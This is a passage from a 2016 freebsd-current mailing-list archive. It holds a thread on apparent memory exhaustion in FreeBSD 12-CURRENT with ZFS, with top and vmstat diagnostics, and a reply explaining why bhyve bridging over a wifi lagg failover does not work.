Date: Fri, 29 Jul 2016 15:03:04 -0400 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Thunderbird/45.2.0 MIME-Version: 1.0 In-Reply-To: <20160729200458.2bb2c6ca.ohartman@zedat.fu-berlin.de> Content-Type: text/plain; charset=windows-1252; format=flowed Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 19:03:13 -0000 On 2016-07-29 14:04, O. Hartmann wrote: > > I realise an exorbitant memory usage of FreeBSD CURRENT ( FreeBSD 12.0-CURRENT #16 > r303470: Fri Jul 29 05:58:42 CEST 2016 ). Swap space gets eaten up while building > world/kernel and/or ports very quickly. > > I see this phenomenon on different CURRENT systems with different RAM (but all ZFS!). No > box is less than 8 GB RAM: one 8GB, another 16, two 32 GB. An older XEON Core2Duo server > with postgresql 9.5/postgis acting on some OSM data etas up all of its 32 GB and > additional 48GB swap - never seen before with 11-CURRENT. > > I didn't investigate the problem so far since I realized this memory hunger of 12-CURRENT > just today on several boxes compiling world, eating up all the memory, staring swapping > and never relax even after hours from the swapped memory. > > Is this a known phenomenon or am I seeing something mystique? > > Regards, > > Oliver > Do you have the output of 'top', the first few lines Specifically, is there very high 'Other' usage, on the ZFS ARC line? -- Allan Jude From owner-freebsd-current@freebsd.org Fri Jul 29 19:10:33 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 14F12BA854C for ; Fri, 29 Jul 2016 19:10:33 +0000 (UTC) (envelope-from lists@jnielsen.net) Received: from webmail2.jnielsen.NET (webmail2.jnielsen.net [50.114.224.20]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client CN "webmail2.jnielsen.net", Issuer "freebsdsolutions.net" (not verified)) by mx1.freebsd.org (Postfix) with ESMTPS id E61511802 for ; Fri, 29 Jul 2016 19:10:32 +0000 (UTC) (envelope-from lists@jnielsen.net) Received: from [10.3.129.92] (50-207-240-162-static.hfc.comcastbusiness.net [50.207.240.162]) (authenticated bits=0) by webmail2.jnielsen.NET (8.15.2/8.15.2) with ESMTPSA id u6TJ6qPx047223 (version=TLSv1 cipher=ECDHE-RSA-AES256-SHA bits=256 verify=NO); Fri, 29 Jul 2016 13:06:55 -0600 (MDT) (envelope-from lists@jnielsen.net) X-Authentication-Warning: webmail2.jnielsen.NET: Host 50-207-240-162-static.hfc.comcastbusiness.net [50.207.240.162] claimed to be [10.3.129.92] Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Mac OS X Mail 9.3 \(3124\)) Subject: Re: bhyve with lagg failover doesn't work on wifi From: John Nielsen In-Reply-To: <20160729045652.GJ26793@gmail.com> Date: Fri, 29 Jul 2016 13:06:52 -0600 Cc: freebsd-current@freebsd.org Content-Transfer-Encoding: quoted-printable Message-Id: <14F7DC55-3072-452F-AA70-1EA8701327E7@jnielsen.net> References: <20160729045652.GJ26793@gmail.com> To: Randy Westlund X-Mailer: Apple Mail (2.3124) X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 19:10:33 -0000 Generally speaking, you can't bridge the station side of a wireless = link. The access point will only accept frames with the station's MAC = address. So what you are seeing is expected, unfortunately. Your best bet is probably to do NAT. Take lagg0 out of the bridge and = use it as your "public" interface. Assign a local IP to the bridge. Run = a DHCP server on your host (or in another VM on the bridge if you like) = or just use static internal IPs on your VMs. Enable IP forwarding = (gateway_enable=3Dyes in rc.conf). Configure your firewall to NAT your = private range out lagg0. You can do other things with tunneling, etc. but you'll need a remote = endpoint for the tunnel. (If your access point runs FreeBSD you can use = either vxlan or gif+EtherIP and just use the wireless link to carry the = tunnel traffic, but I suspect that you want to roam between arbitrary = access points.) > On Jul 28, 2016, at 10:56 PM, Randy Westlund = wrote: >=20 > I'm using bhyve on 11.0-BETA2, bridging tap0 to lagg0, a failover > between wifi and ethernet. The bhyve VM's networking only works I'm > using ethernet. >=20 >> # Lagg config. >> ifconfig_em0=3D"up" >> create_args_wlan0=3D"wlanaddr 3c:97:0e:46:70:ca" >> wlans_iwn0=3D"wlan0" >> ifconfig_wlan0=3D"WPA" >> cloned_interfaces=3D"lagg0 bridge0 tap0" >> ifconfig_lagg0=3D"laggproto failover laggport em0 laggport wlan0 = DHCP" >> # tap0 and bridge0 are for bhyve. >> ifconfig_bridge0=3D"addm lagg0 addm tap0" >=20 > With the ethernet cable connected, the VM's networking works. But = when > I remove the ethernet cable and lagg0 fails over to wifi, the VM can = no > longer use the network. >=20 > I can use tcpdump to see the DHCP packets going along this path: > vtnet0 -> tap0 -> bridge0 -> lagg0 -> wlan0 >=20 > The DHCP requests appear on wlan0. But the router never sees them. >=20 > Here's the ifconfig output when wlan0 is active: >=20 >> em0: flags=3D8943 = metric 0 mtu 1500 >> = options=3D4219b >> ether 3c:97:0e:46:70:ca >> nd6 options=3D29 >> media: Ethernet autoselect >> status: no carrier >> lo0: flags=3D8049 metric 0 mtu 16384 >> options=3D600003 >> inet6 ::1 prefixlen 128 >> inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2 >> inet 127.0.0.1 netmask 0xff000000 >> nd6 options=3D21 >> groups: lo >> wlan0: flags=3D8943 = metric 0 mtu 1500 >> ether 3c:97:0e:46:70:ca >> nd6 options=3D29 >> media: IEEE 802.11 Wireless Ethernet MCS mode 11ng >> status: associated >> ssid neural_network channel 1 (2412 MHz 11g ht/40+) bssid = c4:04:15:90:f5:fd >> regdomain FCC country US authmode WPA2/802.11i privacy ON >> deftxkey UNDEF AES-CCM 2:128-bit AES-CCM 3:128-bit txpower 30 = bmiss 10 >> scanvalid 60 protmode CTS ampdulimit 64k ampdudensity 8 >> -amsdutx amsdurx shortgi -stbc wme roaming MANUAL >> groups: wlan >> lagg0: flags=3D8943 = metric 0 mtu 1500 >> ether 3c:97:0e:46:70:ca >> inet 192.168.1.17 netmask 0xffffff00 broadcast 192.168.1.255 >> nd6 options=3D29 >> media: Ethernet autoselect >> status: active >> groups: lagg >> laggproto failover lagghash l2,l3,l4 >> laggport: em0 flags=3D1 >> laggport: wlan0 flags=3D4 >> bridge0: flags=3D8843 metric = 0 mtu 1500 >> ether 02:4a:6b:6e:fc:00 >> nd6 options=3D9 >> groups: bridge >> id 00:00:00:00:00:00 priority 32768 hellotime 2 fwddelay 15 >> maxage 20 holdcnt 6 proto rstp maxaddr 2000 timeout 1200 >> root id 00:00:00:00:00:00 priority 32768 ifcost 0 port 0 >> member: tap0 flags=3D143 >> ifmaxaddr 0 port 6 priority 128 path cost 2000000 >> member: lagg0 flags=3D143 >> ifmaxaddr 0 port 4 priority 128 path cost 55 >> tap0: flags=3D8943 = metric 0 mtu 1500 >> options=3D80000 >> ether 00:bd:ea:f0:f6:00 >> nd6 options=3D29 >> media: Ethernet autoselect >> status: active >> groups: tap >> Opened by PID 1322 >=20 From owner-freebsd-current@freebsd.org Fri Jul 29 19:40:52 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 0F58DBA8FE4 for ; Fri, 29 Jul 2016 19:40:52 +0000 (UTC) (envelope-from ohartman@zedat.fu-berlin.de) Received: from outpost1.zedat.fu-berlin.de (outpost1.zedat.fu-berlin.de [130.133.4.66]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id C642B1A58; Fri, 29 Jul 2016 19:40:51 +0000 (UTC) (envelope-from ohartman@zedat.fu-berlin.de) Received: from inpost2.zedat.fu-berlin.de ([130.133.4.69]) by outpost.zedat.fu-berlin.de (Exim 4.85) with esmtps (TLSv1.2:DHE-RSA-AES256-GCM-SHA384:256) (envelope-from ) id <1bTDeL-0042WW-A6>; Fri, 29 Jul 2016 21:40:49 +0200 Received: from x4e34a829.dyn.telefonica.de ([78.52.168.41] helo=thor.walstatt.dynvpn.de) by inpost2.zedat.fu-berlin.de (Exim 4.85) with esmtpsa (TLSv1.2:AES256-GCM-SHA384:256) (envelope-from ) id <1bTDeL-001TYy-0u>; Fri, 29 Jul 2016 21:40:49 +0200 Date: Fri, 29 Jul 2016 21:41:42 +0200 From: "O. Hartmann" To: Allan Jude Cc: freebsd-current@freebsd.org Subject: Re: CURRENT: memory leak? Message-ID: <20160729214142.77f91579.ohartman@zedat.fu-berlin.de> In-Reply-To: <18fe457f-c99e-8747-8692-e199f356f6d5@freebsd.org> References: <20160729200458.2bb2c6ca.ohartman@zedat.fu-berlin.de> <18fe457f-c99e-8747-8692-e199f356f6d5@freebsd.org> Organization: FU Berlin X-Mailer: Claws Mail 3.13.2 (GTK+ 2.24.29; amd64-portbld-freebsd11.0) MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; boundary="Sig_/AVSlqi9vHhAxbxLv/Lq_PtY"; protocol="application/pgp-signature" X-Originating-IP: 78.52.168.41 X-ZEDAT-Hint: A X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 19:40:52 -0000 --Sig_/AVSlqi9vHhAxbxLv/Lq_PtY Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: quoted-printable Am Fri, 29 Jul 2016 15:03:04 -0400 Allan Jude schrieb: > On 2016-07-29 14:04, O. Hartmann wrote: > > > > I realise an exorbitant memory usage of FreeBSD CURRENT ( FreeBSD 12.0-= CURRENT #16 > > r303470: Fri Jul 29 05:58:42 CEST 2016 ). Swap space gets eaten up whil= e building > > world/kernel and/or ports very quickly. > > > > I see this phenomenon on different CURRENT systems with different RAM (= but all ZFS!). > > No box is less than 8 GB RAM: one 8GB, another 16, two 32 GB. An older = XEON Core2Duo > > server with postgresql 9.5/postgis acting on some OSM data etas up all = of its 32 GB > > and additional 48GB swap - never seen before with 11-CURRENT. > > > > I didn't investigate the problem so far since I realized this memory hu= nger of > > 12-CURRENT just today on several boxes compiling world, eating up all t= he memory, > > staring swapping and never relax even after hours from the swapped memo= ry. > > > > Is this a known phenomenon or am I seeing something mystique? > > > > Regards, > > > > Oliver > > =20 >=20 > Do you have the output of 'top', the first few lines >=20 > Specifically, is there very high 'Other' usage, on the ZFS ARC line? >=20 I had to reboot the worst box since it didn't answer on any input or ssh. I= also just restarted the other systems after buildworld/buildkernel of the most recent= src ... I try VBox - it complained last time not having enough memory after I simply buildworld/portupdated ... This is head of top just before I start buildworld/buildkernel on the 8 GB = (dual core/ 4 threads box): last pid: 1645; load averages: 0.13, 0.15, 0.28 up 0+01:08:06 21:24:01 61 processes: 1 running, 60 sleeping CPU: 0.2% us= er, 0.0% nice, 0.4% system, 0.0% interrupt, 99.4% idle Mem: 118M Active, 547M Inac= t, 4376M Wired, 667M Buf, 2788M Free ARC: 2411M Total, 836M MFU, 363M MRU, 32K Anon,= 27M Header, 1185M Other Swap: 64G Total, 64G Free PID USERNAME THR PRI NICE SIZE RES STATE C TIME WCPU CO= MMAND 1002 root 1 20 0 12434M 49192K select 2 0:39 1.34% Xo= rg 514 root 1 20 0 12748K 2252K select 0 0:22 0.27% mo= used 1027 ohartmann 1 20 0 125M 20488K select 0 0:02 0.14% wm= aker 1634 ohartmann 1 20 0 76020K 11988K select 2 0:00 0.09% xt= erm 1645 root 1 20 0 22260K 3588K CPU1 1 0:00 0.08% top 403 root 1 20 0 9588K 5060K select 2 0:00 0.01% de= vd 900 root 1 20 0 88148K 9768K select 2 0:00 0.00% se= ndmail 563 root 1 20 0 12608K 2476K select 0 0:00 0.00% sy= slogd 793 root 1 20 0 22764K 12632K select 0 0:00 0.00% nt= pd [...] This is the top after "make -j4 buildkernel buildworld" (filemon.ko enabled= ) and afterwards a "make update" in /usr/ports which resides on an ZFS 3TB disk a= nd is svn backed and after that 5 minutes wating/relaxing: last pid: 11935; load averages: 0.10, 0.55, 0.64 up 0+01:21:10 21:37:05 66 processes: 1 running, 65 sleeping CPU: 0.4% user, 0.0% nice, 0.6% system, 0.0% interrupt, 99.0% idle Mem: 308M Active, 2805M Inact, 4431M Wired, 775M Buf, 284M Free ARC: 2470M Total, 1007M MFU, 279M MRU, 32K Anon, 31M Header, 1153M Other Swap: 64G Total, 64G Free PID USERNAME THR PRI NICE SIZE RES STATE C TIME WCPU CO= MMAND 1002 root 1 21 0 12433M 44044K select 1 1:02 1.47% Xo= rg 514 root 1 20 0 12748K 2248K select 1 0:24 0.29% mo= used 1027 ohartmann 1 21 0 125M 16536K select 1 0:09 0.18% wm= aker 1645 root 1 20 0 22260K 4096K CPU2 2 0:01 0.08% top 1032 ohartmann 1 20 0 86260K 20344K select 3 0:06 0.06% xt= erm 1634 ohartmann 1 20 0 76020K 10304K select 1 0:01 0.03% xt= erm 21103 ohartmann 1 20 0 76020K 10296K select 1 0:00 0.02% xt= erm 21553 ohartmann 1 20 0 26776K 6136K select 2 0:00 0.00% ssh 793 root 1 20 0 22764K 12632K select 1 0:00 0.00% nt= pd 820 root 1 20 0 43744K 3184K select 0 0:00 0.00% sa= ned 1026 ohartmann 1 20 0 33592K 4028K select 0 0:00 0.00% gp= g-agent [...] I do not understand much of the memory partitioning, but starting with ~ 2 = GB free RAM and ending up with < 300MB free RAM - if correctly interpreted - seems weir= d. I'm out of the office, so I can not access the box that is literaly "explod= ing" right now. Hope you can see something in the glass sphere ... Kind regards, thank you very much in advance, Oliver --Sig_/AVSlqi9vHhAxbxLv/Lq_PtY Content-Type: application/pgp-signature Content-Description: OpenPGP digital signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJXm7F2AAoJEOgBcD7A/5N8TKsH+wckErZE1JOe6yhN3nGFyA0r dxAzfKJpac5KLyV8QeZ5UakY6MdQNx4ZLchVeb750vrZfvpTrLcrKuJDXcDWtS9E p8zKh33O8NOW6frpGD6FOa9vLVtv7ecUGwz70Oi3xlkkiFQzGuU5rdfIdW2zvORy 8nUmiKdHsFUO8+iY0qk9a0jL3wvp+U9OeBqIKVj5jmSxN1CXaJ7rau+K6XABx7JS yjWWwomk9mBbIsxoA2m7Zu2p2A7yenfP8eFMzZsI9wwl9Suo+m9S8RwtLLPcBbS4 NPWrVJz+n55kE8gczwvzQx0LnO0UXy3VkaojaaBrhwjF+vZgI0fqIDKDLOWhIcA= =bdS/ -----END PGP SIGNATURE----- --Sig_/AVSlqi9vHhAxbxLv/Lq_PtY-- From owner-freebsd-current@freebsd.org Fri Jul 29 19:41:19 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 7DD89BA81AE for ; Fri, 29 Jul 2016 19:41:19 +0000 (UTC) (envelope-from yaneurabeya@gmail.com) Received: from mail-qt0-x22b.google.com (mail-qt0-x22b.google.com [IPv6:2607:f8b0:400d:c0d::22b]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 3B3091CA0; Fri, 29 Jul 2016 19:41:19 +0000 (UTC) (envelope-from yaneurabeya@gmail.com) Received: by mail-qt0-x22b.google.com with SMTP id u25so72347126qtb.1; Fri, 29 Jul 2016 12:41:19 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:from:date:message-id:subject:to :cc; bh=tHwOENiOgUyDWzfKSD6XbrmaWMzAsiYVH48A2tKDQUE=; b=yiMZ8ss1hPsbjrdt1HpJgiSXl5NRcRW9VUZfa9n7+BjCNUcLTXilSk2oPhFnCsUje+ NQ8Vyd1HgNaQkMc1y7fFVHBQh2JrfU+5g5Ha97PUj4Kr0mGMyj3QpKa+yBr1vxknnig/ raFtfKi9oYkEbnKQy5UnWjtfQQt2sZ8/KYz152ZCeJAh+eo3P3umh1ToJgFobrGHh6Le jfO18XHkltZwto8GBbLdCJ8gE75GYI2rhlU3tXewwGG8Uf5uVHOc2++C/E48TWZ+IUWd PXMgNj3qt4YQQebrws60s/i0VvD49FLtpVwKySM3/iTIRvdIgF13OIORMqqZ6EDDMHOz MfFA== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20130820; h=x-gm-message-state:mime-version:in-reply-to:references:from:date :message-id:subject:to:cc; bh=tHwOENiOgUyDWzfKSD6XbrmaWMzAsiYVH48A2tKDQUE=; b=b/TwdP4BddxX1bzeY74hPC0BFjvjhQV1BHERG4rH5pbtoURx7jVDsYhXDHNFgERhhQ J307gFS1w6rY55l/oVhTNAL2VS56z/fI01SMw5pgLUbF3CC2J2Uq3aq3WYOIW02TggMH Xb6IjkhJxl21tbENcHNQ7aWTImVk7ezCYxR6lm1kzv6MfTzmghOYYP5F3390rEWGm4ht Z5Fr/i4qWHinuPE5sD3i8TIg6EXdxOw0EbmP/QadcBqXiJJK0KIccZkXmYnEinlzZDti dsylNCTEHdJjnR+cJAvR5M3qBkTOCQMHF8uETYJrNO/zFjiMCkyRQnvuRCG7EdXDbj8t +JbQ== X-Gm-Message-State: AEkoousT2ogHwfHhvCOkX4BccgqFhJqZMp5bxCXGsjjD8bitm80hojQlATj2iye/z/PkeJHyID0lJiqqVu8pdw== X-Received: by 10.200.49.129 with SMTP id h1mr68779368qte.103.1469821278152; Fri, 29 Jul 2016 12:41:18 -0700 (PDT) MIME-Version: 1.0 Received: by 10.233.216.194 with HTTP; Fri, 29 Jul 2016 12:41:17 -0700 (PDT) In-Reply-To: <18fe457f-c99e-8747-8692-e199f356f6d5@freebsd.org> References: <20160729200458.2bb2c6ca.ohartman@zedat.fu-berlin.de> <18fe457f-c99e-8747-8692-e199f356f6d5@freebsd.org> From: Ngie Cooper Date: Fri, 29 Jul 2016 12:41:17 -0700 Message-ID: Subject: Re: CURRENT: memory leak? To: Allan Jude Cc: FreeBSD Current Content-Type: text/plain; charset=UTF-8 X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 19:41:19 -0000 On Fri, Jul 29, 2016 at 12:03 PM, Allan Jude wrote: > On 2016-07-29 14:04, O. Hartmann wrote: >> >> I realise an exorbitant memory usage of FreeBSD CURRENT ( FreeBSD >> 12.0-CURRENT #16 >> r303470: Fri Jul 29 05:58:42 CEST 2016 ). Swap space gets eaten up while >> building >> world/kernel and/or ports very quickly. >> >> I see this phenomenon on different CURRENT systems with different RAM (but >> all ZFS!). No >> box is less than 8 GB RAM: one 8GB, another 16, two 32 GB. An older XEON >> Core2Duo server >> with postgresql 9.5/postgis acting on some OSM data etas up all of its 32 >> GB and >> additional 48GB swap - never seen before with 11-CURRENT. >> >> I didn't investigate the problem so far since I realized this memory >> hunger of 12-CURRENT >> just today on several boxes compiling world, eating up all the memory, >> staring swapping >> and never relax even after hours from the swapped memory. >> >> Is this a known phenomenon or am I seeing something mystique? >> >> Regards, >> >> Oliver >> > > Do you have the output of 'top', the first few lines > > Specifically, is there very high 'Other' usage, on the ZFS ARC line? `vmstat -Hm | sort -rnk 2,3 | head -n 10` might be helpful if the memory used is in kernel space. Thanks, -Ngie From owner-freebsd-current@freebsd.org Fri Jul 29 19:51:46 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 8B1C0BA8557 for ; Fri, 29 Jul 2016 19:51:46 +0000 (UTC) (envelope-from ohartman@zedat.fu-berlin.de) Received: from outpost1.zedat.fu-berlin.de (outpost1.zedat.fu-berlin.de [130.133.4.66]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (Client did not present a certificate) by mx1.freebsd.org (Postfix) with ESMTPS id 4B9011458; Fri, 29 Jul 2016 19:51:46 +0000 (UTC) (envelope-from ohartman@zedat.fu-berlin.de) Received: from inpost2.zedat.fu-berlin.de ([130.133.4.69]) by outpost.zedat.fu-berlin.de (Exim 4.85) with esmtps (TLSv1.2:DHE-RSA-AES256-GCM-SHA384:256) (envelope-from ) id <1bTDou-00450N-Bp>; Fri, 29 Jul 2016 21:51:44 +0200 Received: from x4e34a829.dyn.telefonica.de ([78.52.168.41] helo=thor.walstatt.dynvpn.de) by inpost2.zedat.fu-berlin.de (Exim 4.85) with esmtpsa (TLSv1.2:AES256-GCM-SHA384:256) (envelope-from ) id <1bTDou-001UG8-2X>; Fri, 29 Jul 2016 21:51:44 +0200 Date: Fri, 29 Jul 2016 21:52:32 +0200 From: "O. Hartmann" To: Ngie Cooper Cc: Allan Jude , FreeBSD Current Subject: Re: CURRENT: memory leak? Message-ID: <20160729215232.3f1c0ab6.ohartman@zedat.fu-berlin.de> In-Reply-To: References: <20160729200458.2bb2c6ca.ohartman@zedat.fu-berlin.de> <18fe457f-c99e-8747-8692-e199f356f6d5@freebsd.org> Organization: FU Berlin X-Mailer: Claws Mail 3.13.2 (GTK+ 2.24.29; amd64-portbld-freebsd11.0) MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha256; boundary="Sig_/J9r2uxdAa5aD9D6m/xUX7Jy"; protocol="application/pgp-signature" X-Originating-IP: 78.52.168.41 X-ZEDAT-Hint: A X-BeenThere: freebsd-current@freebsd.org X-Mailman-Version: 2.1.22 Precedence: list List-Id: Discussions about the use of FreeBSD-current List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 29 Jul 2016 19:51:46 -0000 --Sig_/J9r2uxdAa5aD9D6m/xUX7Jy Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: quoted-printable Am Fri, 29 Jul 2016 12:41:17 -0700 Ngie Cooper schrieb: > On Fri, Jul 29, 2016 at 12:03 PM, Allan Jude wrot= e: > > On 2016-07-29 14:04, O. Hartmann wrote: =20 > >> > >> I realise an exorbitant memory usage of FreeBSD CURRENT ( FreeBSD > >> 12.0-CURRENT #16 > >> r303470: Fri Jul 29 05:58:42 CEST 2016 ). Swap space gets eaten up whi= le > >> building > >> world/kernel and/or ports very quickly. > >> > >> I see this phenomenon on different CURRENT systems with different RAM = (but > >> all ZFS!). No > >> box is less than 8 GB RAM: one 8GB, another 16, two 32 GB. An older XE= ON > >> Core2Duo server > >> with postgresql 9.5/postgis acting on some OSM data etas up all of its= 32 > >> GB and > >> additional 48GB swap - never seen before with 11-CURRENT. > >> > >> I didn't investigate the problem so far since I realized this memory > >> hunger of 12-CURRENT > >> just today on several boxes compiling world, eating up all the memory, > >> staring swapping > >> and never relax even after hours from the swapped memory. > >> > >> Is this a known phenomenon or am I seeing something mystique? > >> > >> Regards, > >> > >> Oliver > >> =20 > > > > Do you have the output of 'top', the first few lines > > > > Specifically, is there very high 'Other' usage, on the ZFS ARC line? =20 >=20 > `vmstat -Hm | sort -rnk 2,3 | head -n 10` might be helpful if the > memory used is in kernel space. > Thanks, > -Ngie > _______________________________________________ > freebsd-current@freebsd.org mailing list > https://lists.freebsd.org/mailman/listinfo/freebsd-current > To unsubscribe, send any mail to "freebsd-current-unsubscribe@freebsd.org" This is after starting VBox and a Win 7 pro guest (just started, no login) = with 3572 MB memory reserved and 4 logical CPUs (VBox 5.0.26): root@localhost: [ports] vmstat -Hm | sort -rnk 2,3 | head -n 10 solaris 53030 62088K - 23000705 16,32,64,128,256,512,1024,2048,4096,8192,32768 devbuf 20600 39751K - = 21380 16,32,64,128,256,512,1024,2048,4096,8192,16384,65536 iprtheap 9335 16498K = - 12303 32,64,128,256,512,1024,2048,4096,8192,16384,32768,65536 nvidia 8162= 21261K - 549305 16,32,64,128,256,512,1024,2048,4096,8192,16384,32768,65536 sysc= tloid 6004 309K - 6125 16,32,64,128 acpica 5605 574K - 65245 16,32,64,128,256,512,1024,2048,4096 umtx 1728 216K - 1728 128 ufs_dirhash 1543 678K - 7175 16,32,64,128,256,512,1024,2048 pmc 1066 6679K - 1066 16,32,128,256,512,1024,4096,81= 92,65536 kdtrace 950 218K - 113551 64,256 And the top output is : last pid: 12145; load averages: 0.65, 0.45, 0.45 up 0+01:35:15 21:51:10 72 processes: 1 running, 71 sleeping CPU: 1.4% us= er, 0.0% nice, 20.5% system, 0.2% interrupt, 77.9% idle Mem: 21M Active, 293M Inact= , 7429M Wired, 775M Buf, 85M Free ARC: 1682M Total, 363M MFU, 1077M MRU, 5536K Anon, 20M H= eader, 216M Other Swap: 64G Total, 400M Used, 64G Free PID USERNAME THR PRI NICE SIZE RES STATE C TIME WCPU CO= MMAND 12077 ohartmann 25 20 0 4319M 3911M select 3 2:07 77.87% Vi= rtualBox 1002 root 1 23 0 12475M 31616K select 3 1:18 6.02% Xo= rg 1027 ohartmann 1 25 0 125M 9440K select 0 0:15 1.35% wm= aker 514 root 1 20 0 12748K 1916K select 0 0:26 1.28% mo= used 11980 ohartmann 45 20 0 826M 248M select 0 0:23 0.13% fi= refox 1645 root 1 20 0 22260K 2640K CPU2 2 0:02 0.10% top 1634 ohartmann 1 20 0 76020K 4180K select 0 0:01 0.09% xt= erm 1032 ohartmann 1 20 0 86260K 5852K select 3 0:06 0.06% xt= erm 12009 ohartmann 4 20 0 329M 35496K select 0 0:01 0.03% Vi= rtualBox 12014 ohartmann 12 20 0 125M 7624K select 1 0:01 0.02% VB= oxSVC 403 root 1 20 0 9588K 556K select 0 0:00 0.01% de= vd 12012 ohartmann 1 20 0 90036K 5164K select 2 0:00 0.01% VB= oxXPCOMIPCD 563 root 1 20 0 12608K 1916K select 2 0:01 0.00% sy= slogd 793 root 1 20 0 22764K 12632K select 0 0:00 0.00% nt= pd 820 root 1 20 0 43744K 2228K select 1 0:00 0.00% sa= ned 1026 ohartmann 1 20 0 33592K 3044K select 3 0:00 0.00% gp= g-agent 721 root 1 20 0 268M 1768K select 2 0:00 0.00% rp= c.statd 930 root 4 52 0 8364K 1852K rpcsvc 2 0:00 0.00% nf= scbd [...] --Sig_/J9r2uxdAa5aD9D6m/xUX7Jy Content-Type: application/pgp-signature Content-Description: OpenPGP digital signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJXm7QAAAoJEOgBcD7A/5N8/9wH/ipecwfVU0b9AaroGKA3+d+3 2ODqHCPGZEaQni/WujdjOOjiQ3IE8XYN0+Hm79oqb5msk6lOohjIsnVZox4yZLRd kHVL6fWmhHpqIJnJJ8eGNxsip/7V33LgfoBEACLcCfRw9ioTFQEbgtmqtoFUSHP3 VaOGuslWQA9BHxuor/FGGqI1/TxPyu4UdgP/ry5pfL9/JR3iwVGAmT6E6xexdFFG B+JnmAbfiIezb7tu5ONYlpH4VBzk8QSg+ehcvrxOpM6e6CuRYU+C1e8GQHWAyWIM xd3hLd0Vd7FbOGPOZqAOiMUEF1RGGmyVbBcy0IR7L7FecZIdq0NULzr9omNZpiQ= =1TSf -----END PGP SIGNATURE----- --Sig_/J9r2uxdAa5aD9D6m/xUX7Jy-- From owner-freebsd-current@freebsd.org Fri Jul 29 19:53:56 2016 Return-Path: Delivered-To: freebsd-current@mailman.ysv.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) by mailman.ysv.freebsd.org (Postfix) with ESMTP id 7B1CABA85EF for ; Fri, 29 Jul 2016 19:53:56 +0000 (UTC) (envelope-from yaneurabeya@gmail.com) Received: from mail-qt0-x230.google.com (mail-qt0-x230.google.com [IPv6:2607:f8b0:400d:c0d::230]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (Client CN "smtp.gmail.com", Issuer "Google Internet Authority G2" (verified OK)) by mx1.freebsd.org (Postfix) with ESMTPS id 36A5B1681; Fri, 29 Jul 2016 19:53:56 +0000 (UTC) (envelope-from yaneurabeya@gmail.com) Received: by mail-qt0-x230.google.com with SMTP id w38so72893599qtb.0; Fri, 29 Jul 2016 12:53:56 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:from:date:message-id:subject:to :cc; bh=S4I360m9UNILwhou9E5e0CPJXZ34gNDehokqHAxHQks=; b=mMolWQFwj2IQQJ824M6JtwZWpgdGpQ16QQFZQ/ibuV4MQMFXGbJE1yIeobmNaz2uSA F/b/83fh3JW+tt926qPRAxW5rOWjJ+AGWSYph+4F1ONuwiOjZINeKPwW8gxhY2s4uAom yFC/z3dl0SMoG3u8x+K8fAnhM6MPczCJpEzIsYelz7g0V734AOfWyBjx7NHmHOBbgftV iACHkfWcdAVIAayrUXOOU2xhPHVHDjt0OGMe9bLh2YBbrXa3zDv6DncfoFCEBlz5o7Qe 